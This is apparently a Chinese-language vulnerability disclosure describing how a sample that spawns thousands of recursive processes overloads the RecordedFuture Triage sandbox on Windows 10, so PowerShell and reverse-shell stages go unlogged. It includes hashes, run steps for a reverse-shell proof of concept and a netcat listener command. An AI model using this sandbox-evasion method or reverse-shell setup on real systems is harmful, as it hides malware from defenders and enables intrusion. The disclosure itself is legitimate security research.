RecordedFuture Triage 沙箱 Windows 10 build 2004 和 Windows 10 LTSC 2021 的 Windows 行为分析引擎中存在一个严重漏洞,允许提交的恶意软件样本规避检测并导致拒绝分析。当样本递归生成大量子进程时,会触发该漏洞,产生高日志量并耗尽系统资源。因此,关键恶意行为(包括 PowerShell 执行和反弹 Shell 活动)可能不会被记录或报告,从而误导分析人员,并损害沙箱分析结果的完整性和可用性。
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H样本 vathos_rev.exe(SHA256:3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b)展示了 RecordedFuture Triage Windows 行为分析引擎中的拒绝分析状况。
在 Windows 10 配置下引爆时,该样本递归生成数千个子进程,耗尽进程跟踪与日志记录资源。因此,沙箱仅报告极少的行为数据,且无法记录关键的恶意操作。
win10v2004-20250610-enx64104s213s1/10vathos_rev.exe 持续进行进程递归win10ltsc2021-20250619-enx64105s215s1/10vathos_rev.exe 持续进行进程递归在两个 Windows 10 沙箱环境中,尽管恶意软件在主机上执行了预期的 PowerShell 执行和反弹 Shell 阶段,但引爆未能捕获这些行为。
沙箱的行为分析引擎因递归进程生成而过载,导致遥测数据被截断或缺失。
这证实了一个拒绝分析漏洞:在高递归和高日志量下,行为引擎无法报告恶意活动,从而导致漏报和不完整的取证输出。
公开报告参考:
https://tria.ge/250822-qfystshk51
这是 RecordedFuture Triage 中的一个拒绝分析漏洞,可导致动态分析引擎无法捕获或报告行为活动。利用该漏洞,攻击者可绕过行为检测并生成不完整或缺失的分析报告。
主要影响
下游后果
vathos_rev.exe
3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4bdca2fc8f69f6493c7a9c1ce9a68b24549b4688ba4788e34bce47d91b0accc98d33dbf8d2924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b270 KB250822-qfystshk51win10ltsc2021-20250619-enx642025-08-22 13:12 UTC2025-08-22 13:18 UTC250822-qfystshk51win10v2004-20250610-enx642025-08-22 13:12 UTC2025-08-22 13:18 UTC注意: RecordedFuture 未公开暴露引擎构建和内部版本详细信息。
所有观察结果均基于 RecordedFuture Triage 平台(提交250822-qfystshk51)上可复现的公开引爆。
所提供的演示通过生成极高的进程规模和深度嵌套的运行时活动,重现了拒绝分析(DoA)状况。该演示生成大量子进程,并在最终的 PowerShell 反弹 Shell 阶段之前执行多轮 XOR 解密。在受影响的 Triage Windows 10 镜像中,最终载荷阶段未被记录或被截断,而其他镜像(例如 Windows 11)则会捕获完整行为。
如何运行
poc/vathos_demo.exe <IP> <PORT>
在指定的 IP/端口上启动监听器(例如 nc -lvp 4444),以观察尝试的连接。该演示会生成极大量的进程并执行多轮 XOR 解密,最终以 PowerShell 反弹 Shell 阶段告终。在受影响的 Triage 配置中,尽管样本在主机上执行了最终载荷阶段,该阶段仍可能不会被记录。
图 1 - Triage 概览仪表板

图 2 - Windows 10 v2004 行为报告(最少遥测数据 / DoA 示例)

图 3 - Windows 10 LTSC 2021 行为报告(最少遥测数据 / DoA 示例)

图 4 - Windows 10 LTSC 中记录的示例进程(已脱敏,并非所有进程都被记录)— 分析日志 → 进程
